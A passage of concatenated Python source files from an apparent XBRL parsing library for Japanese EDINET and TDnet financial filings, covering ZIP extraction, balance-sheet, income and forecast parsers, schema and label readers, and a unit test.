root_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__))).replace('\\', '/')
data_path = root_dir + '/python/data'
download_path = root_dir + '/zip/download'
extract_path = root_dir + '/zip/extract'
def get_zip_dic():
"""EDINETコードとダウンロードしたZIPファイルのリストの辞書を返す。
* 辞書のキー : EDINETコード
* 辞書の値 : ダウンロードしたZIPファイルのリスト
Returns:
辞書
"""
dic = {}
# For every ZIP file in the download folder.
for zip_path_obj in Path(download_path).glob("**/*.zip"):
zip_path = str(zip_path_obj)
# Get the EDINET code from the file name.
edinetCode = os.path.basename(zip_path).split('-')[0]
if edinetCode in dic:
# The EDINET code is already in the dictionary.
dic[edinetCode].append(zip_path)
else:
# The EDINET code is not in the dictionary yet.
dic[edinetCode] = [ zip_path ]
return dic
def group_zip(cpu_count, cpu_id, dic):
"""CPUごとのサブプロセスの処理
EDINETコードをCPU数で割った余りがCPU-IDに等しければ処理をする。
Args:
cpu_count(int): CPU数
cpu_id (int): CPU-ID (0, ..., CPU数 - 1)
dic : EDINETコードとダウンロードしたZIPファイルのリストの辞書
"""
xbrl = re.compile('XBRL/PublicDoc/jpcrp[-_0-9a-zA-Z]+\.xbrl')
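# Note (added): this pattern matches the XBRL instance file under XBRL/PublicDoc/,
# e.g. a name like "jpcrp030000-asr-001_E00436-000_2018-03-31_01_2018-06-26.xbrl".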
for edinetCode, zip_paths in dic.items():
assert edinetCode[0] == 'E'
if int(edinetCode[1:]) % cpu_count != cpu_id:
# Skip when the EDINET code modulo the CPU count is not this CPU id.
continue
extract_sub_path = '%s/%s' % (extract_path, cpu_id)
if not os.path.exists(extract_sub_path):
# Create the extraction folder if it does not exist.
os.makedirs(extract_sub_path)
# Path of the extraction target ZIP file.
extract_zip_path = "%s/%s.zip" % (extract_sub_path, edinetCode)
print(extract_zip_path)
# Open the extraction target ZIP file for writing.
with zipfile.ZipFile(extract_zip_path, 'w', compression=zipfile.ZIP_DEFLATED) as new_zip:
# For each downloaded ZIP file.
for zip_path in zip_paths:
try:
# Open the downloaded ZIP file for reading.
with zipfile.ZipFile(zip_path) as zf:
# For each XBRL file inside the downloaded ZIP.
for xbrl_file in [x for x in zf.namelist() if xbrl.match(x)]:
# Read the XBRL file data.
with zf.open(xbrl_file) as f:
xml_bin = f.read()
# Write the XBRL file into the extraction target ZIP.
file_name = xbrl_file.split('/')[-1]
new_zip.writestr(file_name, xml_bin)
break
except zipfile.BadZipFile:
print("\nBadZipFile : %s\n" % zip_path)
continue
if __name__ == '__main__':
dic = get_zip_dic()
cpu_count = multiprocessing.cpu_count()
process_list = []
# Spawn one subprocess per CPU and process in parallel.
for cpu_id in range(cpu_count):
p = Process(target=group_zip, args=(cpu_count, cpu_id, dic))
process_list.append(p)
p.start()
# Wait for all subprocesses to finish.
for p in process_list:
p.join()
```
#### File: xbrl-reader/python/stats.py
```python
import os
import codecs
root_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__))).replace('\\', '/')
data_path = root_dir + '/python/data'
def dump_ele(tree_f, max_len_dic, ele, nest, processed):
if not ele in max_len_dic.keys():
return len(processed)
if ele in processed:
if tree_f is not None:
tree_f.write("%s%s %s *\n" % (" "*nest, ele.verbose_label, ele.id))
else:
processed.add(ele)
if tree_f is not None:
tree_f.write("%s%s %s\n" % (" "*nest, ele.verbose_label, ele.id))
for x in ele.child_elements:
dump_ele(tree_f, max_len_dic, x, nest + 1, processed)
return len(processed)
def set_max_len_parent2(top_items, max_len_dic, ele):
if len(ele.parents) == 0:
top_items.add(ele)
return 0
if len(ele.parents) == 1:
return set_max_len_parent(top_items, max_len_dic, ele.parents[0]) + 1
parent_lens = [ set_max_len_parent(top_items, max_len_dic, x) for x in ele.parents ]
max_len = max(parent_lens)
for parent, parent_len in zip(list(ele.parents), parent_lens):
if parent_len < max_len:
assert parent in ele.parents
ele.parents.remove(parent)
assert ele in parent.child_elements
parent.child_elements.remove(ele)
return max_len + 1
def set_max_len_parent(top_items, max_len_dic, ele):
if ele in max_len_dic:
return max_len_dic[ele]
max_len = set_max_len_parent2(top_items, max_len_dic, ele)
max_len_dic[ele] = max_len
return max_len
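# Note (added): set_max_len_parent memoizes the longest parent-chain length per element,
# and set_max_len_parent2 prunes links from parents that are not on a longest chain,
# so the calculation graph is reduced to a tree before dump_ele prints it.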
def write_calc_tree(context_names, ns_xsd_dic, annual_account_stats, quarterly_account_stats, rank = 200):
instant_account_dic = set()
duration_account_dic = set()
# For each report type
for report_name, account_stats in zip([ "有価証券報告書", "四半期報告書" ], [annual_account_stats, quarterly_account_stats]):
# For each accounting standard
for accounting_standard, stats in account_stats.items():
# For each context type
for idx, context_name in enumerate(context_names):
if not context_name.startswith('CurrentYear'):
continue
if 'Instant' in context_name:
# Instant (point-in-time) context
dic = instant_account_dic
else:
# Duration (period) context
assert 'Duration' in context_name
dic = duration_account_dic
counts = list(sorted(stats[idx].items(), key=lambda x:x[1], reverse=True))
# Use only the most frequent items.
counts = counts[: rank]
for count in counts:
dic.add(count[0])
instant_account_ids = list(instant_account_dic)
duration_account_ids = list(duration_account_dic)
ns_xsd_dic2 = {}
for ns, dic in ns_xsd_dic.items():
dic2 = {}
ns_xsd_dic2[ns] = dic2
for key, ele in dic.items():
if key != ele.id:
continue
dic2[key] = ele
if len(ele.calcTo) != 0:
ele.calcTo = sorted(ele.calcTo, key=lambda x: x.order)
ele.child_elements = [x.to for x in ele.calcTo]
for x in ele.child_elements:
assert not ele in x.parents
x.parents.append(ele)
tree_f = codecs.open("%s/calc_tree.txt" % data_path, 'w', 'utf-8')
for ids, context_name in zip([ instant_account_ids, duration_account_ids ], [ "会計終了時点", "会計期間" ]):
tree_f.write("\n%s\nコンテスト : %s\n%s\n" % ('-'*80, context_name, '-'*80) )
all_items = []
for id in ids:
ns, tag_name = id.split(':')
# Get the schema dictionary for the namespace.
assert ns in ns_xsd_dic2
xsd_dic = ns_xsd_dic2[ns]
# Get the element for the tag name.
if not tag_name in xsd_dic:
tag_name = ns + "_" + tag_name
assert tag_name in xsd_dic
ele =xsd_dic[tag_name]
if ele.type in ['stringItemType', 'textBlockItemType', 'dateItemType']:
continue
if not ele in all_items:
all_items.append(ele)
top_items = set()
max_len_dic = {}
for ele in all_items:
set_max_len_parent(top_items, max_len_dic, ele)
top_cnts = [ [ele, dump_ele(None, max_len_dic, ele, 0, set())] for ele in top_items ]
top_cnts = sorted(top_cnts, key=lambda x:x[1], reverse=True)
for ele, cnt in top_cnts:
dump_ele(tree_f, max_len_dic, ele, 0, set())
tree_f.close()
``` |
{
"source": "5laps2go/xbrr",
"score": 2
} |
#### File: 5laps2go/xbrr/check_performance.py
```python
import os
import shutil
import pyfbi
from xbrr.edinet.client.document_client import DocumentClient
from xbrr.edinet.reader.reader import Reader
from xbrr.edinet.reader.doc import Doc
from xbrr.edinet.reader.aspects.finance import Finance
@pyfbi.target
def check():
_dir = os.path.join(os.path.dirname(__file__), "./data")
if os.path.exists(_dir):
shutil.rmtree(_dir)
else:
os.mkdir(_dir)
client = DocumentClient()
xbrl_root = client.get_xbrl("S100G2KL", save_dir=_dir, expand_level="dir")
xbrl_doc = Doc(root_dir=xbrl_root, xbrl_kind="public")
reader = Reader(xbrl_doc)
print("Start Calculation")
bs = reader.extract(Finance).bs()
bs.to_csv("bs.csv", index=False, encoding="shift_jis")
shutil.rmtree(_dir)
with pyfbi.watch():
check()
pyfbi.dump("result")
pyfbi.show()
```
#### File: reader/aspects/test_forecast.py
```python
import os
import shutil
import unittest
from xbrr.tdnet.client.document_client import DocumentClient
from xbrr.edinet.reader.reader import Reader
from xbrr.tdnet.reader.doc import Doc
from xbrr.tdnet.reader.aspects.forecast import Forecast
class TestForecast(unittest.TestCase):
@classmethod
def setUpClass(cls):
_dir = os.path.join(os.path.dirname(__file__), "../../data")
client = DocumentClient()
# "081220210818487667" J-共和工業 2022年4月期 第1四半期決算短信〔日本基準〕(連結)
# root_dir = client.get_xbrl("081220210818487667", save_dir=_dir,
# expand_level="dir")
root_dir = os.path.join(_dir, "081220210818487667")
xbrl_doc = Doc(root_dir=root_dir, xbrl_kind="summary")
cls.reader = Reader(xbrl_doc, save_dir=_dir)
cls._dir = _dir
@classmethod
def tearDownClass(cls):
# shutil.rmtree(cls.reader.xbrl_doc.root_dir)
if os.path.exists(cls.reader.taxonomies_root):
shutil.rmtree(cls.reader.taxonomies_root)
def test_accounting_standards(self):
feature = self.reader.extract(Forecast).accounting_standards
self.assertEqual(feature, "日本基準")
feature = self.reader.extract(Forecast).consolidated
self.assertTrue(feature)
def test_fiscal_period_kind(self):
feature = self.reader.extract(Forecast).fiscal_period_kind
self.assertEqual(feature, "1")
def test_roles(self):
roles = self.reader.custom_roles
self.assertTrue(len(roles) > 0)
self.assertIn('RoleBusinessResultsQuarterlyOperatingResults', roles) # quarterly operating results
self.assertIn('RoleBusinessResultsQuarterlyFinancialPositions', roles) # quarterly financial position
self.assertIn('RoleQuarterlyDividends', roles) # dividend status
self.assertIn('RoleQuarterlyForecasts', roles) # quarterly forecasts
def test_namespaces(self):
namespaces = self.reader.namespaces
self.assertTrue(len(namespaces) > 0)
self.assertIn('tse-ed-t', namespaces)
# self.assertIn('tse-qcedjpsm-15150', namespaces)
def test_fc(self):
fc = self.reader.extract(Forecast).fc()
# fc.to_csv(os.path.join(self._dir, 'test_fc.csv'))
self.assertTrue(fc is not None)
self.assertGreater(len(fc), 0)
```
#### File: base/reader/xbrl_doc.py
```python
import os
from datetime import datetime
from xbrr.base.reader.base_doc import BaseDoc
from bs4 import BeautifulSoup
class XbrlDoc(BaseDoc):
def __init__(self, package, root_dir="", xbrl_file=""):
super().__init__(package, root_dir=root_dir, xbrl_file=xbrl_file)
self._cache = {}
def read_schemaRefs(xsd_xml):
refs = {}  # avoid shadowing the built-in dict
schema = xsd_xml.find('schema')
refs[schema['targetNamespace']] = os.path.basename(self.find_path('xsd'))
for ref in xsd_xml.find_all('import'):
refs[ref['namespace']] = ref['schemaLocation']
return refs
def read_linkbaseRefs(xsd_xml):
href_list = []
for ref in xsd_xml.find_all('link:linkbaseRef'):
# ex.: <link:linkbaseRef xlink:type="simple" xlink:href="jpcrp030000-asr-001_E00436-000_2018-03-31_01_2018-06-26_pre.xml" xlink:role="http://www.xbrl.org/2003/role/presentationLinkbaseRef" xlink:arcrole="http://www.w3.org/1999/xlink/properties/linkbase" />
linkrole = ref.get('xlink:role')
linkrole = linkrole.split('/')[-1] if linkrole is not None else ''
href_list.append((ref['xlink:href'], linkrole))
return href_list
xsd_xml = self.xsd
self._schema_dic = read_schemaRefs(xsd_xml)
self._linkbase_tuples = read_linkbaseRefs(xsd_xml)
def read_file(self, kind):
path = self.find_path(kind)
if (not os.path.isfile(path)):
return None
if kind not in self._cache:
with open(path, encoding="utf-8-sig") as f:
self._cache[kind] = BeautifulSoup(f, "lxml-xml")
return self._cache[kind]
def find_laburi(self, xsduri, kind) -> str:
"""find label xml uri by schema uri"""
namespace = xsduri
if xsduri.startswith('http'):
namespace = next(k for k,v in self._schema_dic.items() if v==xsduri)
href = self._find_linkbaseRef(kind, namespace)
if len(href) == 0:
path = self.find_path(kind)
href = os.path.basename(path)
return href
def find_xsduri(self, namespace) -> str:
"""find xsd uri by namespace """
if namespace not in self._schema_dic:
if namespace.startswith('http'):
raise LookupError("Unknown namespace: " + namespace)
# for "local" namespace
xsdloc = os.path.basename(self.find_path('xsd'))
return xsdloc
return self._schema_dic[namespace]
def _find_linkbaseRef(self, kind, namespace) -> str:
if namespace.startswith('http'):
# if namespace!="local":
ns_base = "/".join(namespace.split('/')[0:-1])
else:
ns_base = os.path.basename(os.path.splitext(self.xbrl_file)[0])
for pair in self._linkbase_tuples:
if pair[0].startswith(ns_base) and pair[0].endswith(kind+".xml"):
return pair[0]
return ''  # keep the declared str return type; find_laburi tests len(href) == 0
```
#### File: reader/aspects/finance.py
```python
import warnings
import re
import collections
import importlib.util
if importlib.util.find_spec("pandas") is not None:
import pandas as pd
from xbrr.base.reader.base_parser import BaseParser
from xbrr.edinet.reader.element_value import ElementValue
class Finance(BaseParser):
def __init__(self, reader):
tags = {
"voluntary_accounting_policy_change": "jpcrp_cor:NotesVoluntaryChangesInAccountingPoliciesConsolidatedFinancialStatementsTextBlock",
"segment_information": "jpcrp_cor:NotesSegmentInformationEtcConsolidatedFinancialStatementsTextBlock",
"real_estate_for_lease": "jpcrp_cor:NotesRealEstateForLeaseEtcFinancialStatementsTextBlock",
"accounting_standards": "jpdei_cor:AccountingStandardsDEI", # accounting standards, from the DEI metadata
}
super().__init__(reader, ElementValue, tags)
@property
def use_IFRS(self):
return self.accounting_standards.value == 'IFRS'
def bs(self, ifrs=False, use_cal_link=True):
role = self.__find_role_name('bs')
role_uri = self.reader.get_role(role[0]).uri
# role_uri = "http://disclosure.edinet-fsa.go.jp/role/jppfs/rol_BalanceSheet"
# if ifrs and self.use_IFRS:
# role_uri = "http://disclosure.edinet-fsa.go.jp/role/jpigp/rol_ConsolidatedStatementOfFinancialPositionIFRS"
bs = self.reader.read_value_by_role(role_uri, use_cal_link=use_cal_link)
return self.__filter_duplicate(bs)
def pl(self, ifrs=False, use_cal_link=True):
role = self.__find_role_name('pl')
role_uri = self.reader.get_role(role[0]).uri
# role_uri = "http://disclosure.edinet-fsa.go.jp/role/jppfs/rol_StatementOfIncome"
# if ifrs and self.use_IFRS:
# role_base = "http://disclosure.edinet-fsa.go.jp/role/jpigp/"
# role_uri = f"{role_base}rol_ConsolidatedStatementOfComprehensiveIncomeIFRS"
pl = self.reader.read_value_by_role(role_uri, use_cal_link=use_cal_link)
return self.__filter_duplicate(pl)
def cf(self, ifrs=False, use_cal_link=True):
role = self.__find_role_name('cf')
if len(role) == 0:
textblock = self.__read_value_by_textblock(["StatementOfCashFlows"])
return self.__read_finance_statement(textblock.html) if textblock is not None else None
role = role[0]
role_uri = self.reader.get_role(role).uri
cf = self.reader.read_value_by_role(role_uri, use_cal_link=use_cal_link)
return self.__filter_duplicate(cf)
def __filter_duplicate(self, data):
# Exclude dimension member
if data is not None:
data.drop_duplicates(subset=("name", "period"), keep="first",
inplace=True)
return data
def __find_role_name(self, finance_statement):
role_candiates = {
'bs': ["StatementOfFinancialPositionIFRS", "ConsolidatedBalanceSheet", "BalanceSheet"],
'pl': ["StatementOfProfitOrLossIFRS", "StatementOfIncome"],
'cf': ["StatementOfCashFlowsIFRS", "StatementOfCashFlows"],
}
roles = []
for name in role_candiates[finance_statement]:
roles += [x for x in self.reader.custom_roles.keys() if name in x and 'Notes' not in x and x not in roles]
return roles
def __read_value_by_textblock(self, candidates):
values = self.reader.find_value_names(candidates)
textblocks = [x for x in values if x.endswith('TextBlock')]
if len(textblocks) == 0:
return None
element_value = self.reader.findv(textblocks[0])
return element_value
def __read_finance_statement(self, statement_xml):
def myen(value):
if value=='-':
return '000'
myen = value.replace(',','').replace('△', '-')
return myen
def isnum(myen):
try:
float(myen)
except ValueError:
return False
else:
return True
indent_state = []
def indent_label(margin_left):
delidx = [i for i,x in enumerate(indent_state) if int(x) > int(margin_left)]
if len(delidx) > 0: del indent_state[delidx[0]:]
indent_state.append(margin_left)
c = collections.Counter(indent_state)
ks = sorted(c.keys(), key=int)
return "-".join([str(c[x]) for x in ks])
unit = ''
values = []
for table in statement_xml.select('table'):
for record in table.select('tr'):
columns = list(record.select('td'))
label = ''.join([x.text.strip() for x in columns[0].select('p')])
value = myen(columns[-1].text.strip())
style_str = columns[0].find('p')['style'] if label != "" else ""
m = re.match(r'.*margin-left: *([0-9]*).?[0-9]*px.*', style_str)
margin = m.groups()[0] if m is not None else "0"
if isnum(value):
values.append({
'label': label,
'value': value + unit,
'indent': indent_label(margin)
})
elif label != "" and value == "":
values.append({
'label': label,
'indent': indent_label(margin)
})
else:
assert value=='' or '単位:' in value or '百万円' in value or '当連結会計年度' in value
if '百万円' in value: # e.g. 単位:百万円 / 金額(百万円) = unit / amount stated in millions of yen
unit = '000000'
elif '単位:円' in value:
unit = ''
return pd.DataFrame(values)
```
#### File: reader/aspects/stock.py
```python
from xbrr.base.reader.base_parser import BaseParser
from xbrr.edinet.reader.element_value import ElementValue
class Stock(BaseParser):
def __init__(self, reader):
tags = {
"dividend_paid": "jpcrp_cor:DividendPaidPerShareSummaryOfBusinessResults", # dividend paid per share
"dividends_surplus": "jppfs_cor:DividendsFromSurplus", # dividends from surplus
"purchase_treasury_stock": "jppfs_cor:PurchaseOfTreasuryStock", # purchase of treasury stock (share buyback)
}
super().__init__(reader, ElementValue, tags)
```
#### File: edinet/reader/element_schema.py
```python
from xbrr.base.reader.base_element_schema import BaseElementSchema
from bs4.element import NavigableString, Tag
import bs4
class ElementSchema(BaseElementSchema):
def __init__(self,
name="", reference="", label="", alias="",
abstract="", data_type="",
period_type="", balance=""):
super().__init__()
self.name = name
self.reference = reference
self.label = label
self.alias = alias
self.abstract = abstract
self.period_type = period_type
self.balance = balance
self.verbose_label = ""
# data types:
# domain, textBlock, percent, perShare, boolean, date, decimal,
# monetary, nonNegativeInteger, shares, string
self.data_type = data_type
if data_type is not None and ':' in data_type:
self.data_type = data_type.split(':')[-1].replace('ItemType','')
def set_alias(self, alias):
self.alias = alias
return self
@classmethod
def create_from_reference(cls, reader, reference):
if not reader.xbrl_doc.has_schema: # for test purpose only
name = reference.split("#")[-1]
instance = cls(name=name, reference=reference)
return instance
instance = reader.get_schema_by_link(reference)
instance.reference = reference
return instance
@classmethod
def read_schema(cls, reader, xsduri):
xsd_dic = {}
xml = reader.read_uri(xsduri)
for element in xml.find_all("element"):
# <xsd:element id="jpcrp030000-asr_E00436-000_Subsidy" xbrli:balance="credit" xbrli:periodType="duration" abstract="false" name="Subsidy" nillable="true" substitutionGroup="xbrli:item" type="xbrli:monetaryItemType" />
instance = cls(name=element["id"], alias=element["name"],
data_type=element["type"],
period_type=element["xbrli:periodType"],
abstract=element["abstract"] if element.get("abstract") else "",
balance=element.get("xbrli:balance") if element.get("xbrli:balance") else "")
xsd_dic[element["id"]] = instance
return xsd_dic
@classmethod
def read_label_taxonomy(cls, reader, xsduri, xsd_dic):
label_xml = reader.read_label_of_xsd(xsduri)
loc_dic = {}
resource_dic = {}
def read_label(elem: bs4.element.Tag):
if elem.name == "loc":
attrs = elem.attrs
assert 'xlink:href' in attrs and 'xlink:label' in attrs
# href = jpcrp040300-q1r-001_E04251-000_2016-06-30_01_2016-08-12.xsd#jpcrp040300-q1r_E04251-000_ProvisionForLossOnCancellationOfContractEL
# label = ProvisionForLossOnCancellationOfContractEL
v = elem['xlink:href'].split('#')
assert len(v) == 2
loc_dic[elem['xlink:label']] = v[1]
elif elem.name == "label":
attrs = elem.attrs
if 'xlink:label' in attrs and 'xlink:role' in attrs:
label_role = "http://www.xbrl.org/2003/role/label"
verboseLabel_role = "http://www.xbrl.org/2003/role/verboseLabel"
if elem['xlink:role'] in [label_role, verboseLabel_role]:
resource_dic[elem['xlink:label']] = {'role': elem['xlink:role'], 'text': elem.text}
elif elem.name == "labelArc":
attrs = elem.attrs
if 'xlink:from' in attrs and 'xlink:to' in attrs and elem['xlink:to'] in resource_dic:
if elem['xlink:from'] in loc_dic and loc_dic[elem['xlink:from']] in xsd_dic:
ele = xsd_dic[loc_dic[elem['xlink:from']]]
res = resource_dic[elem['xlink:to']]
ele.set_label(**res) # Label(res['role'], res['text'])
for elem in label_xml.find_all('labelLink'): # "link:labelLink"
for child in elem.children:
if isinstance(child, Tag):
read_label(child)
def set_label(self, role, text):
if role.endswith('label'):
self.label = text
elif role.endswith('verboseLabel'):
self.verbose_label = text
def to_dict(self):
return {
"name": self.name,
"reference": self.reference,
"label": self.label,
"abstract": self.abstract,
"data_type": self.data_type,
"period_type": self.period_type,
"balance": self.balance
}
```
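A quick sanity check of the `data_type` normalisation implemented by `ElementSchema` above. This is only a sketch; the import path is assumed from the repository layout (`edinet/reader/element_schema.py` under the `xbrr` package).

```python
# Sketch: exercise ElementSchema directly (import path assumed from the repo layout).
from xbrr.edinet.reader.element_schema import ElementSchema

schema = ElementSchema(name="jpcrp030000-asr_E00436-000_Subsidy",
                       alias="Subsidy",
                       data_type="xbrli:monetaryItemType",
                       period_type="duration",
                       balance="credit")
print(schema.data_type)              # "monetary" -- namespace prefix and "ItemType" suffix are stripped
print(schema.to_dict()["balance"])   # "credit"
```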
#### File: reader/aspects/forecast.py
```python
import re
import warnings
from xbrr.base.reader.base_parser import BaseParser
from xbrr.edinet.reader.element_value import ElementValue
class Forecast(BaseParser):
def __init__(self, reader):
tags = {
"document_name": "tse-ed-t:DocumentName",
"security_code": "tse-ed-t:SecuritiesCode",
"company_name": "tse-ed-t:CompanyName",
"company_name_en": "jpdei_cor:FilerNameInEnglishDEI",
"filling_date": "tse-ed-t:FilingDate",
"forecast_correction_date": "tse-ed-t:ReportingDateOfFinancialForecastCorrection",
"dividend_correction_date": "tse-ed-t:ReportingDateOfDividendForecastCorrection",
"forecast_correction_flag": "tse-ed-t:CorrectionOfConsolidatedFinancialForecastInThisQuarter",
"dividend_correction_flag": "tse-ed-t:CorrectionOfDividendForecastInThisQuarter",
"sales": "tse-ed-t:Sales",
"sales_IFRS": "tse-ed-t:SalesIFRS"
}
reit_tags = {
"document_name": "tse-re-t:DocumentName",
"security_code": "tse-re-t:SecuritiesCode",
"company_name": "tse-re-t:IssuerNameREIT",
"filling_date": "tse-re-t:FilingDate",
"forecast_correction_date": "tse-ed-t:ReportingDateOfFinancialForecastCorrection",
"sales_REIT": "tse-re-t:OperatingRevenuesREIT",
"sales_IFRS": "tse-ed-t:SalesIFRS"
}
if "tse-ed-t" in reader.namespaces:
super().__init__(reader, ElementValue, tags)
elif "tse-re-t" in reader.namespaces:
super().__init__(reader, ElementValue, reit_tags)
dic = str.maketrans('1234567890()()[ ]〔〕[]','1234567890####% %%%%%')
title = self.document_name.value.translate(dic).strip().replace(' ','')
m = re.match(r'(第(.)四半期|中間)?.*決算短信([%#]([^%#]*)[%#])?(#(.*)#)?', title)
if m is not None:
self.consolidated = '連結' == m.groups()[5]
self.fiscal_period_kind = 'a' if m.groups()[1]==None else m.groups()[1]
self.accounting_standards = m.groups()[3]
elif ('業績予想' in title or '配当予想' in title):
self.fiscal_period_kind = '0'
else:
raise Exception("Unknown title found!")
@property
def use_IFRS(self):
return self.sales_IFRS.value is not None
@property
def reporting_date(self):
wareki = {'令和': 2019} # map Japanese era name ("Reiwa") to its first Gregorian year
dic = str.maketrans('1234567890()[]','1234567890()[]')
def wareki2year(elemvalue):
date1 = elemvalue.value.translate(dic).replace(' ','')
for waname in wareki.keys():
m = re.search(r'{}([0-9]+)年'.format(waname), date1.translate(dic).replace(' ',''))
if m is not None:
elemvalue.value = date1.replace(
waname+m.groups()[0],str(int(m.groups()[0])+wareki[waname]-1))
return elemvalue
if self.filling_date.value is not None:
return wareki2year(self.filling_date)
if self.forecast_correction_date.value is not None:
return wareki2year(self.forecast_correction_date)
if self.dividend_correction_date.value is not None:
return wareki2year(self.dividend_correction_date)
raise NameError('Reporting date not found')
@property
def reporting_period(self):
role = self.__find_role_name('fc_test')
if len(role) <= 0: return 'Q2'
return 'FY'
@property
def fc_q2ytd_period(self):
role = self.__find_role_name('fc_q2ytd')
if len(role) <= 0: return ''
return 'Q2'
@property
def forecast_year(self):
return 'NextYear' if self.fiscal_period_kind=='a' else 'CurrentYear'
def fc(self, ifrs=False, use_cal_link=True):
role = self.__find_role_name('fc')
if len(role) <= 0: return None
role = role[0]
role_uri = self.reader.get_role(role).uri
fc = self.reader.read_value_by_role(role_uri, use_cal_link=use_cal_link)
return self.__filter_duplicate(fc) if fc is not None else None
def fc_dividends(self, ifrs=False, use_cal_link=True):
role = self.__find_role_name('fc_dividends')
if len(role) <= 0: return None
role = role[0]
role_uri = self.reader.get_role(role).uri
fc = self.reader.read_value_by_role(role_uri, use_cal_link=use_cal_link)
return self.__filter_duplicate(fc) if fc is not None else None
def q2ytd(self, ifrs=False, use_cal_link=True):
role = self.__find_role_name('fc_q2ytd')
if len(role) <= 0: return None
role = role[0]
role_uri = self.reader.get_role(role).uri
q2ytd = self.reader.read_value_by_role(role_uri, use_cal_link=use_cal_link)
return self.__filter_duplicate(q2ytd) if q2ytd is not None else None
def __filter_duplicate(self, data):
# Exclude dimension member
data.drop_duplicates(subset=("name", "member","period"), keep="first",
inplace=True)
return data
def __find_role_name(self, finance_statement):
role_candiates = {
'fc': ["RoleForecasts", "RoleQuarterlyForecasts", "InformationAnnual"], # securities report, earnings summary, earnings-forecast revision
'fc_dividends': ["RoleDividends", "RoleQuarterlyDividends", "RoleRevisedDividend"], # securities report, earnings summary, dividend-forecast revision
'fc_test': ["RoleForecasts", "RoleQuarterlyForecasts", "InformationAnnual", "RoleDividends", "RoleQuarterlyDividends", "RoleRevisedDividend"],
'fc_q2ytd': ["InformationQ2YTD"],
}
roles = []
for name in role_candiates[finance_statement]:
roles += [x for x in self.reader.custom_roles.keys() if name in x and x not in roles]
return roles
```
#### File: tdnet/reader/doc.py
```python
import os
import errno
import glob
from datetime import datetime
from xbrr.base.reader.xbrl_doc import XbrlDoc
from xbrr.edinet.reader.taxonomy import Taxonomy as EdinetTaxonomy
from xbrr.tdnet.reader.taxonomy import Taxonomy as TdnetTaxonomy
import subprocess
from subprocess import PIPE
from typing import Tuple, Dict
class Doc(XbrlDoc):
def __init__(self, root_dir="", xbrl_kind=""):
def _glob_list(folders):
for folder in folders:
xsd_files = glob.glob(os.path.join(root_dir, folder+"/*.xsd"))
if xsd_files: return xsd_files
return []
def _xbrl_file(root_dir, kind):
folder_dict = {'public': ['XBRLData/Attachment'], 'summary': ['XBRLData/Summary','.']}
xsd_files = _glob_list(folder_dict[kind])
if not xsd_files:
raise FileNotFoundError(
errno.ENOENT, os.strerror(errno.ENOENT), folder_dict[kind])
xbrl_file = self._prepare_xbrl(xsd_files[0])
return xbrl_file
xbrl_file=_xbrl_file(root_dir, xbrl_kind)
self.file_spec = os.path.splitext(xbrl_file)[0]
super().__init__("tdnet", root_dir=root_dir, xbrl_file=xbrl_file)
def find_path(self, kind) -> str:
# TDNET report file name spec. is like EDINET
suffix = {
"xbrl": ".xbrl", "xsd": ".xsd", "cal": "-cal.xml", "def": "-def.xml",
"lab": "-lab.xml", "lab-en": "-lab-en.xml", "pre": "-pre.xml",
}
if kind == "man":
path = os.path.join(os.path.dirname(self.file_spec), "manifest.xml")
if len(path)==0:
return None
elif kind in suffix:
path = self.file_spec + suffix[kind]
else: # kind=file name case
path = os.path.join(os.path.dirname(self.file_spec), kind)
return path
@property
def default_linkbase(self) -> dict:
if 'Attachment' in self.file_spec:
return {
'doc': self.pre,
'link_node': 'link:presentationLink',
'arc_node': 'link:presentationArc',
'roleRef': 'link:roleRef',
'arc_role': 'parent-child'
}
assert 'Summary' in self.file_spec or '/./' in self.file_spec
return {
'doc': self.def_,
'link_node': 'definitionLink',
'arc_node': 'definitionArc',
'roleRef': 'roleRef',
'arc_role': 'domain-member'
}
@property
def published_date(self) -> Tuple[datetime, str]:
if 'Attachment' in self.file_spec:
# Attachment/tse-acedjpfr-36450-2021-05-31-01-2021-07-14
# 0 1 2 3 4 5 6 7 8 9
v = os.path.basename(self.file_spec).split('-')
date = datetime.strptime("%s-%s-%s" % (v[7], v[8], v[9]), "%Y-%m-%d")
period = v[1][0]
return date, period
elif 'Summary' in self.file_spec or '/./' in self.file_spec:
# Summary/tse-acedjpsm-36450-20210714336450
# 0 1 2 3
v = os.path.basename(self.file_spec).split('-')
date = datetime.strptime("%s-%s-%s" % (v[3][:4], v[3][4:6], v[3][6:8]), "%Y-%m-%d")
period = v[1][0]
return date, period
else:
raise FileNotFoundError("No Attachment or Summary folder found.")
def create_taxonomies(self, root_dir) -> Dict[str, object]:
if 'Attachment' in self.file_spec:
etxnmy = EdinetTaxonomy(root_dir)
ttxnmy = TdnetTaxonomy(root_dir)
return {etxnmy.prefix: etxnmy, ttxnmy.prefix: ttxnmy}
assert 'Summary' in self.file_spec or '/./' in self.file_spec
ttxnmy = TdnetTaxonomy(root_dir)
return {ttxnmy.prefix: ttxnmy}
def _prepare_xbrl(self, xsd_file: str) -> str:
"""process ixbrl to xbrl
"""
if not os.path.isfile(xsd_file):
raise Exception(f"XSD file does not exist: {xsd_file}")
xsl_file = "/usr/local/share/inlinexbrl/processor/Main_exslt.xsl"
self.file_spec = os.path.splitext(xsd_file)[0]
ixbrl_file = self.file_spec+"-ixbrl.htm"
manifest_file = self.find_path('man')
infile = manifest_file if os.path.isfile(manifest_file) else ixbrl_file
xbrl_file = self.file_spec + ".xbrl"
command = "xsltproc -o %s %s %s" % (xbrl_file, xsl_file, infile)
proc = subprocess.run(command, shell=True, stdout=PIPE, stderr=PIPE, text=True)
if not os.path.isfile(xbrl_file):
raise Exception(f"XBRL file was not generated: {xbrl_file}\n{proc.stderr}")
return xbrl_file
```
#### File: tdnet/reader/taxonomy.py
```python
from pathlib import Path
from zipfile import ZipFile
from datetime import datetime
from io import BytesIO
import requests
from xbrr.base.reader.base_taxonomy import BaseTaxonomy
class Taxonomy(BaseTaxonomy):
TAXONOMIES = {
"2014": "https://www.jpx.co.jp/equities/listing/xbrl/tvdivq00000088ai-att/61_taxonomy.zip",
}
def __init__(self, taxonomy_root):
super().__init__(
root = taxonomy_root,
prefix = "http://www.xbrl.tdnet.info/taxonomy/")
def __reduce_ex__(self, proto):
return type(self), (self.root,)
def download(self, published_date:datetime, kind:str):
year = str(self.taxonomy_year(published_date, kind))
expand_dir = self.root.joinpath("taxonomy").joinpath(year)
self.path = expand_dir
taxonomy_file = self.root.joinpath(f"{year}_taxonomy.zip")
download = False
if not self.root.exists():
self.root.mkdir(parents=True, exist_ok=True)
download = True
if not expand_dir.exists():
